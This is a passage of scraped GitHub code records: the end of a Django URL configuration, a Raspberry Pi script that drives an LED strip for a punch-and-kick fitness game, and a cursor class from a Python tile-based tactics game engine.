path('/non-wh-ingredient/', login_required(views.NonWarehouseIngredientListView.as_view()), name='non-wh-ingredient-list'),\n\n # NonWarehouseProduct CRUD\n path('non-wh-product/', login_required(views.NonWarehouseProductListView.as_view()), name='non-wh-product-list'),\n path('non-wh-product/create/', login_required(views.NonWarehouseProductCreateView.as_view()), name='non-wh-product-create'),\n path('non-wh-product//', login_required(views.NonWarehouseProductDetailView.as_view()), name='non-wh-product-detail'),\n path('non-wh-product//update/', login_required(views.NonWarehouseProductUpdateView.as_view()), name='non-wh-product-update'),\n path('non-wh-product//delete/', login_required(views.NonWarehouseProductDeleteView.as_view()), name='non-wh-product-delete'),\n]","repo_name":"JOSELAGOSG/Chocolates53SurDEMO","sub_path":"recipe_cost_calculator/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6826290006","text":"import neopixel\r\nimport threading\r\nimport xml.etree.ElementTree as ET\r\nimport time\r\nfrom pifighterinit import *\r\n\r\n# Setting up the various colours\r\nLEFT_PUNCH_COLOUR = neopixel.Color(255,0,0)\r\nRIGHT_PUNCH_COLOUR = neopixel.Color(0,255,0)\r\nLEFT_KICK_COLOUR = neopixel.Color(255,0,50)\r\nRIGHT_KICK_COLOUR = neopixel.Color(0,255,100)\r\nWAIT_COLOUR = neopixel.Color(0,0,255)\r\nNO_STATE_COLOUR = neopixel.Color(0,0,0)\r\nFINISHED_COLOUR = neopixel.Color(255,255, 255)\r\n\r\n# KickButt Mode Colours\r\nVERY_HEALTHY_COLOUR = neopixel.Color(0,100,0) # RGB\r\nDAMAGED_COLOUR = neopixel.Color(100,100,0)\r\nDANGER_COLOUR = neopixel.Color(100,0,0)\r\nKO_COLOUR = neopixel.Color(0,0,100)\r\n\r\n# WS2812 - LED strip configuration:\r\nLED_COUNT = 16 # Number of LED pixels. 0-7 on right 8-15 on left.\r\nLED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!).\r\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\r\nLED_DMA = 5 # DMA channel to use for generating signal (try 5)\r\nLED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest\r\nLED_INVERT = False # True to invert the signal (when using NPN transistor level shift)\r\n\r\ndef InitStrip():\r\n\tglobal strip \r\n\t\r\n\t# Create NeoPixel object with appropriate configuration.\r\n\tstrip = neopixel.Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS)\r\n\r\n\t# Intialize the library (must be called once before other functions).\r\n\tstrip.begin()\r\n\r\n# Thread to handle the Attack sequences\r\nclass AttackSeqThread (threading.Thread):\r\n\tdef __init__(self, threadID, name, counter):\r\n\t\tthreading.Thread.__init__(self)\r\n\t\tself.threadID = threadID\r\n\t\tself.name = name\r\n\t\tself.counter = counter\r\n\tdef run(self):\r\n\t\tprint (\"Starting \" + self.name)\r\n\t\t#print_time(self.name, self.counter, 5)\r\n\t\tRunPunchSequence()\r\n\t\tprint (\"Exiting \" + self.name)\r\n\r\n\r\n\t\t\r\n# Runs the Punch Sequence - expected go be run as a separate thread, so it can happen in parallell. \r\ndef RunPunchSequence():\r\n\tglobal strip \r\n\tglobal STD_PUNCH_WAIT\r\n\tglobal CMD_FLASH_TIME\r\n\tglobal BETWEEN_SEQ_REST\r\n\t\r\n\t# Read in the sequences from the XML file.\r\n\tSequenceTree = ET.parse('pi-fighter_seq.xml')\r\n\tSeq_root = SequenceTree.getroot()\r\n\t#print (Seq_root.tag)\r\n\t\r\n\t# Start from last pixel in the strip. \r\n\tCurrentPixel = strip.numPixels() - 1\r\n\t\r\n\tfor Sequence in Seq_root:\r\n\t\t\r\n\t\tprint (Sequence.attrib)\r\n\t\t#device.show_message(Sequence.attrib, font=proportional(CP437_FONT), delay = 0.05)\r\n\t\t#time.sleep(.4)\r\n\r\n\r\n\t\tfor Command in Sequence:\r\n\t\t\tPixelState = [NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR, \r\n\t\t\t NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR,\r\n\t\t\t\t\t\t\tNO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR, \r\n\t\t\t NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR, NO_STATE_COLOUR]\r\n\t\t\t\t\t\t\t\r\n\t\t\t#print (Command.tag)\r\n\t\t\tif Command.tag == 'Attack':\r\n\t\t\t\tfor Attack in Command:\r\n\t\t\t\t\t#print (Attack.tag)\r\n\t\t\t\t\t#print (Attack.text)\r\n\t\t\t\t\r\n\t\t\t\t\tif Attack.tag == 'Punch':\t\t\t\t\t\r\n\t\t\t\t\t\t#print(Attack.text)\r\n\t\t\t\t\t\t# Set the colour according to left or right\r\n\t\t\t\t\t\tif Attack.text == 'Left' : \r\n\t\t\t\t\t\t\tAttackColour = LEFT_PUNCH_COLOUR\r\n\t\t\t\t\t\t\tfor i in range (12,16):\r\n\t\t\t\t\t\t\t\tPixelState[i] = AttackColour\r\n\t\t\t\t\t\telif Attack.text == 'Right' :\r\n\t\t\t\t\t\t\tfor i in range (0,4):\r\n\t\t\t\t\t\t\t\tAttackColour = RIGHT_PUNCH_COLOUR\r\n\t\t\t\t\t\t\t\tPixelState[i] = AttackColour\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tAttackColour =0\r\n\t\t\t\t\t\t\tprint (\"Unrecognised text\", Attack.text)\r\n\t\t\t\t\t\r\n\t\t\t\t\t\tif AttackColour != 0:\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tfor i in range (0,16):\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\t# Set the current pixel as required by the punch sequence - use half the time to display, \r\n\t\t\t\t\t\t\t\t# half off so it is sequence can have 2 of the same in a row\r\n\t\t\t\t\t\t\t\tstrip.setPixelColor(i, PixelState[i]) # Actual strip is Green Red Blue, so swap colours around\r\n\t\t\t\t\t\t\tstrip.show()\r\n\t\t\t\t\t\t\ttime.sleep(CMD_FLASH_TIME/1000)\r\n\r\n\t\t\t\t\t\t\tfor i in range (0,16):\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\t# Set the current pixel as required by the punch sequence - use half the time to display, \r\n\t\t\t\t\t\t\t\t# half off so it is sequence can have 2 of the same in a row\r\n\t\t\t\t\t\t\t\tstrip.setPixelColor(i, neopixel.Color(0,0,0)) # Actual strip is Green Red Blue, so swap colours around\r\n\r\n\t\t\t\t\t\t\tstrip.show()\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\tif Attack.tag == 'Kick':\t\t\t\t\t\r\n\t\t\t\t\t\t#print(Attack.text)\r\n\t\t\t\t\t\t# Set the colour according to left or right\r\n\t\t\t\t\t\tif Attack.text == 'Left' : \r\n\t\t\t\t\t\t\tAttackColour = LEFT_KICK_COLOUR\r\n\t\t\t\t\t\t\tfor i in range (8,12):\r\n\t\t\t\t\t\t\t\tPixelState[i] = AttackColour\r\n\t\t\t\t\t\telif Attack.text == 'Right' :\r\n\t\t\t\t\t\t\tfor i in range (4,8):\r\n\t\t\t\t\t\t\t\tAttackColour = RIGHT_KICK_COLOUR\r\n\t\t\t\t\t\t\t\tPixelState[i] = AttackColour\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tAttackColour =0\r\n\t\t\t\t\t\t\tprint (\"Unrecognised text\", Attack.text)\r\n\t\t\t\t\t\r\n\t\t\t\t\t\tif AttackColour != 0:\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tfor i in range (0,16):\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\t# Set the current pixel as required by the punch sequence - use half the time to display, \r\n\t\t\t\t\t\t\t\t# half off so it is sequence can have 2 of the same in a row\r\n\t\t\t\t\t\t\t\tstrip.setPixelColor(i, PixelState[i]) # Actual strip is Green Red Blue, so swap colours around\r\n\t\t\t\t\t\t\tstrip.show()\r\n\t\t\t\t\t\t\ttime.sleep(CMD_FLASH_TIME/1000)\r\n\r\n\t\t\t\t\t\t\tfor i in range (0,16):\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\t# Set the current pixel as required by the punch sequence - use half the time to display, \r\n\t\t\t\t\t\t\t\t# half off so it is sequence can have 2 of the same in a row\r\n\t\t\t\t\t\t\t\tstrip.setPixelColor(i, neopixel.Color(0,0,0)) # Actual strip is Green Red Blue, so swap colours around\r\n\r\n\t\t\t\t\t\t\tstrip.show()\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\telif Attack.tag == 'Wait':\r\n\t\t\t\t\t\t#print(Attack.text)\r\n\t\t\t\t\t\tfor i in range (0,16):\r\n\t\t\t\t\t\t\tAttackColour = NO_STATE_COLOUR\r\n\t\t\t\t\t\t\tPixelState[i] = AttackColour\r\n\t\t\t\t\t\t\tstrip.setPixelColor(i, PixelState[i])\r\n\t\t\t\t\t\tstrip.show()\r\n\t\t\t\t\t\tAttackWait = (int) (Attack.text) * STD_PUNCH_WAIT / 1000\r\n\t\r\n\t\t\t\t\t\ttime.sleep(AttackWait)\r\n\t\t\telif Command.tag == 'Rest':\r\n\t\t\t\t#print (Command.text)\r\n\t\t\t\tCommandWait = (int) (Command.text) * STD_PUNCH_WAIT / 1000\r\n\t\t\t\tstrip.setPixelColor(CurrentPixel, WAIT_COLOUR) # Turn pixel white when finished\r\n\t\t\t\tstrip.show()\r\n\t\t\t\ttime.sleep(CommandWait)\r\n\t\t\t\t\r\n\r\n\t\t\t\r\n\t\tstrip.setPixelColor(CurrentPixel, FINISHED_COLOUR) # Turn pixel white when finished\r\n\t\tCurrentPixel -= 1\r\n\t\tstrip.show()\r\n\t\ttime.sleep(BETWEEN_SEQ_REST/1000)\r\n\t\t\r\n\t\t# flash to tell the person to get ready\r\n\t\tstrip.setPixelColor(CurrentPixel, WAIT_COLOUR) # Turn pixel white when finished\r\n\t\tstrip.show()\r\n\t\ttime.sleep(3)\r\n\t\tstrip.setPixelColor(CurrentPixel, neopixel.Color(0,0,0)) # Turn pixel off when finished\r\n\t\tstrip.show()\r\n\t\ttime.sleep(3)\r\n\r\ndef IndicateHealthPoints(HealthPoints, Strip):\r\n\tglobal strip \r\n\t\r\n\tHealthPixels = round(HealthPoints/25)\r\n\t\r\n\tif (HealthPoints >0 and HealthPixels == 0):\r\n\t\tHealthPixels = 1\r\n\t\r\n\tprint (HealthPoints)\r\n\tif (HealthPoints > 85):\r\n\t\tPixelColour = VERY_HEALTHY_COLOUR\r\n\telif (HealthPoints >=60 and HealthPoints <=85):\r\n\t\tPixelColour = DAMAGED_COLOUR\t\r\n\telif (HealthPoints >=0 and HealthPoints <60):\r\n\t\tPixelColour = DANGER_COLOUR\r\n\telif (HealthPoints<0):\r\n\t\tPixelColour = KO_COLOUR\r\n\t\t\r\n\tif (Strip ==0):\r\n\t\tif (PixelColour == KO_COLOUR):\r\n\t\t\tfor i in range (7, -1 ,-1):\r\n\t\t\t\tstrip.setPixelColor(i, neopixel.Color(0,0,0)) \r\n\t\t\tstrip.show()\r\n\t\t\ttime.sleep(.3)\r\n\t\t\tfor i in range (7, -1 ,-1):\r\n\t\t\t\tstrip.setPixelColor(i, PixelColour) # Indicate Knock Out\r\n\t\t\t\r\n\t\t# Otherwise indicate health\r\n\t\telse:\r\n\t\t\r\n\t\t\t# Otherwise indicate health\r\n\t\t\tfor i in range (7, 7 - HealthPixels ,-1):\r\n\t\t\t\tstrip.setPixelColor(i, PixelColour) \r\n\t\t\tfor i in range (7-HealthPixels,-1 ,-1):\r\n\t\t\t\tstrip.setPixelColor(i, neopixel.Color(0,0,0)) \r\n\r\n\telif (Strip ==1):\r\n\t\tif (PixelColour == KO_COLOUR):\r\n\t\t\tfor i in range (8, 16):\r\n\t\t\t\tstrip.setPixelColor(i, neopixel.Color(0,0,0)) # Indicate Knock Out\r\n\t\t\tstrip.show()\r\n\t\t\ttime.sleep(.3)\r\n\t\t\tfor i in range (8, 16):\r\n\t\t\t\tstrip.setPixelColor(i, PixelColour) # Indicate Knock Out\r\n\t\telse:\t\r\n\t\t\tfor i in range (8, 8 + HealthPixels):\r\n\t\t\t\tstrip.setPixelColor(i, PixelColour) \r\n\t\t\tfor i in range (8+HealthPixels,16 ,1):\r\n\t\t\t\tstrip.setPixelColor(i, neopixel.Color(0,0,0)) # Turn pixel white when finished\r\n\r\n\tstrip.show()\r\n","repo_name":"Richard-Kirby/Raspberry-Pi-Gym","sub_path":"pi-fighter/pifighterstrip.py","file_name":"pifighterstrip.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"8182232975","text":"try:\n import GlobalConstants as GC\n import configuration as cf\n import Engine, InputManager\nexcept ImportError:\n from . import GlobalConstants as GC\n from . import configuration as cf\n from . import Engine, InputManager\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass Cursor(object):\n def __init__(self, sprite, position, fake=False):\n self.spriteName = sprite\n\n self.fake = fake\n\n self.loadSprites()\n \n self.position = position\n self.currentSelectedUnit = None\n self.secondSelectedUnit = None\n self.currentHoveredUnit = None\n self.currentHoveredTile = None\n self.camera_follow = None\n\n self.fluid_helper = InputManager.FluidScroll(cf.OPTIONS['Cursor Speed'])\n\n self.movePath = []\n\n self.drawState = 0 # If cursor will be drawn\n\n self.back_pressed = False\n self.spriteOffset = [0, 0]\n self.already_stopped_at_move_border = False # Only applies during MoveState in StateMachine\n self.border_position = None # Where the arrow stopped at the border\n \n def draw(self, surf):\n if self.drawState or self.fake: # Only draws if cursor is on\n x, y = self.position\n # The space Rect is constructed like so so as to center the cursor sprite\n topleft = x * GC.TILEWIDTH - max(0, (self.image.get_width() - 16)//2), y * GC.TILEHEIGHT - max(0, (self.image.get_height() - 16)//2)\n topleft = topleft[0] - self.spriteOffset[0], topleft[1] - self.spriteOffset[1]\n surf.blit(self.image, topleft)\n # Reset sprite offset afterwards\n num = 8 if self.back_pressed else 4\n if self.spriteOffset[0] > 0:\n self.spriteOffset[0] = max(0, self.spriteOffset[0] - num)\n elif self.spriteOffset[0] < 0:\n self.spriteOffset[0] = min(0, self.spriteOffset[0] + num)\n if self.spriteOffset[1] > 0:\n self.spriteOffset[1] = max(0, self.spriteOffset[1] - num)\n elif self.spriteOffset[1] < 0:\n self.spriteOffset[1] = min(0, self.spriteOffset[1] + num)\n\n def getHoveredUnit(self, gameStateObj):\n for unit in gameStateObj.allunits:\n if unit.position == self.position:\n return unit\n return None\n\n def init_displays(self):\n self.unit_info_disp = None\n self.tile_info_disp = None\n self.obj_info_disp = None\n\n self.unit_info_offset = 0\n self.tile_info_offset = 0\n self.obj_info_offset = 0\n\n self.remove_unit_info = True\n self.tile_left = False\n self.obj_top = False\n\n def removeSprites(self):\n self.sprite = None\n self.image = None\n self.passivesprite, self.activesprite, self.redsprite = None, None, None\n\n # Current displays\n self.init_displays()\n \n def loadSprites(self):\n # Load sprite\n self.sprite = GC.IMAGESDICT[self.spriteName]\n self.passivesprite, self.activesprite, self.redsprite, self.formationsprite = self.formatSprite(self.sprite)\n self.image = Engine.subsurface(self.passivesprite, (GC.CURSORSPRITECOUNTER.count*GC.TILEWIDTH*2, 0, GC.TILEWIDTH*2, GC.TILEHEIGHT*2)) # 32*32\n\n # Current displays\n self.init_displays()\n\n def remove_unit_display(self):\n self.remove_unit_info = True\n \n def move(self, move, gameStateObj):\n dx, dy = move\n gameStateObj.allarrows = [] # Clear all arrows\n GC.SOUNDDICT['Select 5'].stop() # Play cursor sound on move\n GC.SOUNDDICT['Select 5'].play()\n x, y = self.position\n self.position = x + dx, y + dy\n if gameStateObj.highlight_manager.check_arrow(self.position):\n self.border_position = self.position\n self.place_arrows(gameStateObj)\n # Remove unit display\n self.remove_unit_display()\n # Sprite Offset -- but only if we're not traveling too fast\n if cf.OPTIONS['Cursor Speed'] >= 40:\n if self.back_pressed:\n self.spriteOffset[0] += 8*dx\n self.spriteOffset[1] += 8*dy\n else:\n self.spriteOffset[0] += 12*dx\n self.spriteOffset[1] += 12*dy\n\n def place_arrows(self, gameStateObj):\n # if gameStateObj.stateMachine.getState() == 'move' and gameStateObj.highlight_manager.check_arrow(self.position):\n if gameStateObj.stateMachine.getState() == 'move':\n if self.border_position:\n self.movePath = self.currentSelectedUnit.getPath(gameStateObj, self.border_position)\n else:\n self.movePath = self.currentSelectedUnit.getPath(gameStateObj, self.position)\n self.constructArrows(self.movePath[::-1], gameStateObj)\n\n # The algorithm below is all hard-coded in, which sucks, should change it later, but it WORKS, so thats good\n # ALSO IS EXTREMELY SHITTY ALGORITHM I DON'T UNDERSTAND. was found using trial and error, for the most part\n def constructArrows(self, movePath, gameStateObj):\n arrow = None\n if len(movePath) <= 1: # ie, we haven't really moved yet\n return\n for index in range(len(movePath)):\n if index == 0:\n directionTuple = (movePath[index + 1][0] - movePath[index][0], movePath[index + 1][1] - movePath[index][1])\n if directionTuple == (1, 0): # right\n arrow = ArrowObject((0, 0), movePath[index])\n elif directionTuple == (-1, 0): # left\n arrow = ArrowObject((1, 1), movePath[index])\n elif directionTuple == (0, 1): # up\n arrow = ArrowObject((0, 1), movePath[index])\n elif directionTuple == (0, -1): # down\n arrow = ArrowObject((1, 0), movePath[index])\n elif index == len(movePath) - 1:\n directionTuple = (movePath[index][0] - movePath[index - 1][0], movePath[index][1] - movePath[index - 1][1])\n if directionTuple == (1, 0):\n arrow = ArrowObject((0, 6), movePath[index])\n elif directionTuple == (-1, 0):\n arrow = ArrowObject((1, 7), movePath[index])\n elif directionTuple == (0, -1):\n arrow = ArrowObject((1, 6), movePath[index])\n elif directionTuple == (0, 1):\n arrow = ArrowObject((0, 7), movePath[index])\n else: # Neither beginning nor end of arrow\n directionTuple = (movePath[index + 1][0] - movePath[index - 1][0], movePath[index + 1][1] - movePath[index - 1][1])\n modifierTuple = (movePath[index][0] - movePath[index - 1][0], movePath[index][1] - movePath[index - 1][1])\n if directionTuple == (2, 0) or directionTuple == (-2, 0): # right or left\n arrow = ArrowObject((0, 3), movePath[index])\n elif directionTuple == (0, 2) or directionTuple == (0, -2): # up or down\n arrow = ArrowObject((0, 2), movePath[index])\n elif directionTuple == (1, -1) or directionTuple == (-1, 1):\n if modifierTuple == (0, -1) or modifierTuple == (-1, 0):\n # print \"topleft\"\n arrow = ArrowObject((0, 4), movePath[index])\n else:\n # print \"bottomright\"\n arrow = ArrowObject((1, 5), movePath[index])\n elif directionTuple == (1, 1) or directionTuple == (-1, -1):\n if modifierTuple == (0, -1) or modifierTuple == (1, 0):\n # print \"topright\"\n arrow = ArrowObject((0, 5), movePath[index])\n else: # (0, 1) is one of the modifier tuples that does here.\n # print \"bottomleft\"\n arrow = ArrowObject((1, 4), movePath[index])\n gameStateObj.allarrows.append(arrow)\n \n def handleMovement(self, gameStateObj):\n # Handle Cursor movement - Move the cursor around\n # Refuses to move Cursor if not enough time has passed since the cursor has last moved. This is\n # a hack to slow down cursor movement rate.\n if self.already_stopped_at_move_border: # Must click again to keep moving\n self.fluid_helper.update(gameStateObj, hold=False)\n else:\n self.fluid_helper.update(gameStateObj)\n # Back doubles speed\n gameStateObj.cameraOffset.back_pressed(self.back_pressed) # changes camera speed\n directions = self.fluid_helper.get_directions(double_speed=self.back_pressed)\n\n # This section tries to handle the case where the cursor should STOP when it reaches the units movement borders\n # However, it then needs to continue on when re-pressed\n if gameStateObj.highlight_manager.check_arrow(self.position):\n if directions:\n if ('LEFT' in directions and 'LEFT' not in gameStateObj.input_manager.key_down_events and not gameStateObj.highlight_manager.check_arrow((self.position[0] - 1, self.position[1]))) or \\\n ('RIGHT' in directions and 'RIGHT' not in gameStateObj.input_manager.key_down_events and not gameStateObj.highlight_manager.check_arrow((self.position[0] + 1, self.position[1]))) or \\\n ('UP' in directions and 'UP' not in gameStateObj.input_manager.key_down_events and not gameStateObj.highlight_manager.check_arrow((self.position[0], self.position[1] - 1))) or \\\n ('DOWN' in directions and 'DOWN' not in gameStateObj.input_manager.key_down_events and not gameStateObj.highlight_manager.check_arrow((self.position[0], self.position[1] + 1))):\n if self.already_stopped_at_move_border:\n self.already_stopped_at_move_border = False\n else:\n directions = []\n self.fluid_helper.reset() # Reset input so we don't keep going\n self.already_stopped_at_move_border = True\n else:\n self.already_stopped_at_move_border = False\n else:\n self.already_stopped_at_move_border = False\n\n # Normal movement\n if 'LEFT' in directions and self.position[0] > 0:\n self.move((-1, 0), gameStateObj)\n if self.position[0] <= gameStateObj.cameraOffset.get_x() + 2: # Cursor controls camera movement\n # Set x is move the camera. Move it to its x_pos - 1, cause we're moving left\n gameStateObj.cameraOffset.set_x(gameStateObj.cameraOffset.x - 1)\n elif 'RIGHT' in directions and self.position[0] < (gameStateObj.map.width - 1):\n self.move((1, 0), gameStateObj)\n if self.position[0] >= (GC.TILEX + gameStateObj.cameraOffset.get_x() - 3):\n gameStateObj.cameraOffset.set_x(gameStateObj.cameraOffset.x + 1)\n if 'UP' in directions and self.position[1] > 0:\n self.move((0, -1), gameStateObj)\n if self.position[1] <= gameStateObj.cameraOffset.get_y() + 2:\n gameStateObj.cameraOffset.set_y(gameStateObj.cameraOffset.y - 1)\n elif 'DOWN' in directions and self.position[1] < (gameStateObj.map.height - 1):\n self.move((0, 1), gameStateObj)\n if self.position[1] >= (GC.TILEY + gameStateObj.cameraOffset.get_y() - 3):\n gameStateObj.cameraOffset.set_y(gameStateObj.cameraOffset.y + 1)\n\n def setPosition(self, newposition, gameStateObj):\n if not newposition:\n return \n logger.debug('Cursor new position %s', newposition)\n self.position = newposition\n # Recenter camera\n if self.position[0] <= gameStateObj.cameraOffset.get_x() + 2: # Too far left\n gameStateObj.cameraOffset.set_x(self.position[0] - 3) # Testing...\n if self.position[0] >= (GC.TILEX + gameStateObj.cameraOffset.get_x() - 3):\n gameStateObj.cameraOffset.set_x(self.position[0] + 4 - GC.TILEX)\n if self.position[1] <= gameStateObj.cameraOffset.get_y() + 2:\n gameStateObj.cameraOffset.set_y(self.position[1] - 2)\n if self.position[1] >= (GC.TILEY + gameStateObj.cameraOffset.get_y() - 3):\n gameStateObj.cameraOffset.set_y(self.position[1] + 3 - GC.TILEY)\n # Remove unit display\n self.remove_unit_display()\n\n def forcePosition(self, newposition, gameStateObj):\n if not newposition:\n return \n logger.debug('Cursor new position %s', newposition)\n self.position = newposition\n # Recenter camera\n if self.position[0] <= gameStateObj.cameraOffset.get_x() + 2: # Too far left\n gameStateObj.cameraOffset.force_x(self.position[0] - 3) # Testing...\n if self.position[0] >= (GC.TILEX + gameStateObj.cameraOffset.get_x() - 3):\n gameStateObj.cameraOffset.force_x(self.position[0] + 4 - GC.TILEX)\n if self.position[1] <= gameStateObj.cameraOffset.get_y() + 2:\n gameStateObj.cameraOffset.force_y(self.position[1] - 2)\n if self.position[1] >= (GC.TILEY + gameStateObj.cameraOffset.get_y() - 3):\n gameStateObj.cameraOffset.force_y(self.position[1] + 3 - GC.TILEY)\n # Remove unit display\n self.remove_unit_display()\n\n def autocursor(self, gameStateObj, force=False):\n player_units = [unit for unit in gameStateObj.allunits if unit.team == 'player' and unit.position]\n lord = [unit for unit in player_units if 'Lord' in unit.tags]\n if force:\n if lord:\n self.forcePosition(lord[0].position, gameStateObj)\n elif player_units:\n self.forcePosition(player_units[0].position, gameStateObj)\n else:\n if lord:\n self.setPosition(lord[0].position, gameStateObj)\n elif player_units:\n self.setPosition(player_units[0].position, gameStateObj)\n\n def formatSprite(self, sprite):\n # Sprites are in 64 x 64 boxes\n passivesprite = Engine.subsurface(sprite, (0, 0, GC.TILEWIDTH*2*4, GC.TILEHEIGHT*2))\n redsprite = Engine.subsurface(sprite, (0, GC.TILEHEIGHT*2, GC.TILEWIDTH*2*4, GC.TILEHEIGHT*2))\n activesprite = Engine.subsurface(sprite, (0, GC.TILEHEIGHT*4, GC.TILEWIDTH*2, GC.TILEHEIGHT*2))\n formationsprite = Engine.subsurface(sprite, (GC.TILEWIDTH*2*2, GC.TILEHEIGHT*4, GC.TILEWIDTH*2*2, GC.TILEHEIGHT*2))\n return passivesprite, activesprite, redsprite, formationsprite\n\n def drawPortraits(self, surf, gameStateObj):\n legal_states = ['free', 'prep_formation', 'prep_formation_select']\n # Unit Info handling\n if self.remove_unit_info:\n if gameStateObj.stateMachine.getState() in legal_states and self.currentHoveredUnit: # Get this \n self.remove_unit_info = False\n self.unit_info_disp = self.currentHoveredUnit.createPortrait(gameStateObj)\n self.unit_info_offset = min(self.unit_info_disp.get_width(), self.unit_info_offset)\n elif self.unit_info_disp:\n self.unit_info_offset += 20\n if self.unit_info_offset >= 200:\n self.unit_info_disp = None\n else:\n self.unit_info_offset -= 20\n self.unit_info_offset = max(0, self.unit_info_offset)\n\n # Tile Info Handling\n if gameStateObj.stateMachine.getState() in legal_states and cf.OPTIONS['Show Terrain']:\n self.tile_info_disp = gameStateObj.map.getDisplay(self.position, gameStateObj)\n if self.tile_info_disp:\n self.tile_info_offset = min(self.tile_info_disp.get_width(), self.tile_info_offset)\n self.tile_info_offset -= 20\n self.tile_info_offset = max(0, self.tile_info_offset)\n elif self.tile_info_disp:\n self.tile_info_offset += 20\n if self.tile_info_offset >= 200:\n self.tile_info_disp = None\n\n # Objective Info Handling\n if gameStateObj.stateMachine.getState() in legal_states and cf.OPTIONS['Show Objective']:\n self.obj_info_disp = gameStateObj.objective.draw(gameStateObj)\n self.obj_info_offset -= 20\n self.obj_info_offset = max(0, self.obj_info_offset)\n elif self.obj_info_disp:\n self.obj_info_offset += 20\n if self.obj_info_offset >= 200:\n self.obj_info_disp = None\n\n # === Final blitting\n # Should be in topleft, unless cursor is in topleft, in which case it should be in bottomleft\n if self.unit_info_disp:\n if self.position[1] < GC.TILEY//2 + gameStateObj.cameraOffset.get_y() and \\\n not (self.position[0] > GC.TILEX//2 + gameStateObj.cameraOffset.get_x() - 1):\n surf.blit(self.unit_info_disp, (0 - self.unit_info_offset, GC.WINHEIGHT - 0 - self.unit_info_disp.get_height()))\n else:\n surf.blit(self.unit_info_disp, (0 - self.unit_info_offset, 0))\n\n if self.tile_info_disp:\n # Should be in bottom, no matter what. Can be in bottomleft or bottomright, depending on where cursor is\n if self.position[0] > GC.TILEX//2 + gameStateObj.cameraOffset.get_x() - 1: # If cursor is right\n if self.tile_left:\n self.tile_left = False\n self.tile_info_offset = self.tile_info_disp.get_width()\n surf.blit(self.tile_info_disp, (5 - self.tile_info_offset, GC.WINHEIGHT - self.tile_info_disp.get_height() - 3)) # Bottomleft\n else:\n if not self.tile_left:\n self.tile_left = True\n self.tile_info_offset = self.tile_info_disp.get_width()\n pos = (GC.WINWIDTH - self.tile_info_disp.get_width() - 5 + self.tile_info_offset, GC.WINHEIGHT - self.tile_info_disp.get_height() - 3)\n surf.blit(self.tile_info_disp, pos) # Bottomright\n\n if self.obj_info_disp:\n # Should be in topright, unless the cursor is in the topright\n # TopRight - I believe this has RIGHT precedence\n if self.position[1] < GC.TILEY//2 + gameStateObj.cameraOffset.get_y() and \\\n gameStateObj.cursor.position[0] > GC.TILEX//2 + gameStateObj.cameraOffset.get_x() - 1:\n # Gotta place in bottomright, because cursor is in topright\n if self.obj_top:\n self.obj_top = False\n self.obj_info_offset = self.obj_info_disp.get_width()\n pos = (GC.WINWIDTH - GC.TILEWIDTH//4 + self.obj_info_offset - self.obj_info_disp.get_width(), \n GC.WINHEIGHT - GC.TILEHEIGHT//4 - self.obj_info_disp.get_height())\n surf.blit(self.obj_info_disp, pos) # Should be bottom right\n else:\n # Place in topright\n if not self.obj_top:\n self.obj_top = True\n self.obj_info_offset = self.obj_info_disp.get_width()\n surf.blit(self.obj_info_disp, (GC.WINWIDTH - GC.TILEWIDTH//4 + self.obj_info_offset - self.obj_info_disp.get_width(), 1))\n\n def take_input(self, eventList, gameStateObj):\n if not self.fake:\n self.handleMovement(gameStateObj)\n\n def update(self, gameStateObj):\n self.currentHoveredUnit = gameStateObj.grid_manager.get_unit_node(self.position)\n\n if not self.drawState:\n self.remove_unit_display()\n\n self.fluid_helper.update_speed(cf.OPTIONS['Cursor Speed'])\n\n if gameStateObj.stateMachine.getState() == 'prep_formation_select':\n if 'Formation' in gameStateObj.map.tile_info_dict[self.position]:\n self.image = Engine.subsurface(self.formationsprite, (0, 0, GC.TILEWIDTH*2, GC.TILEHEIGHT*2))\n else:\n self.image = Engine.subsurface(self.formationsprite, (GC.CURSORSPRITECOUNTER.count//2*GC.TILEWIDTH*2, 0, GC.TILEWIDTH*2, GC.TILEHEIGHT*2))\n elif self.drawState == 2 and gameStateObj.stateMachine.getState() != 'dialogue': # Red if it is selecting...\n self.image = Engine.subsurface(self.redsprite, (GC.CURSORSPRITECOUNTER.count*GC.TILEWIDTH*2, 0, GC.TILEWIDTH*2, GC.TILEHEIGHT*2))\n elif self.currentHoveredUnit and self.currentHoveredUnit.team == 'player' and \\\n not self.currentHoveredUnit.isDone() and gameStateObj.stateMachine.getState() != 'dialogue':\n self.image = self.activesprite\n else:\n self.image = Engine.subsurface(self.passivesprite, (GC.CURSORSPRITECOUNTER.count*GC.TILEWIDTH*2, 0, GC.TILEWIDTH*2, GC.TILEHEIGHT*2))\n\n# === GENERIC ARROW OBJECT ===================================================\nclass ArrowObject(object):\n sprite = GC.IMAGESDICT['MovementArrows']\n\n def __init__(self, index, position):\n rindex, cindex = index\n left = 1 + ((GC.TILEWIDTH + 2)*cindex) + 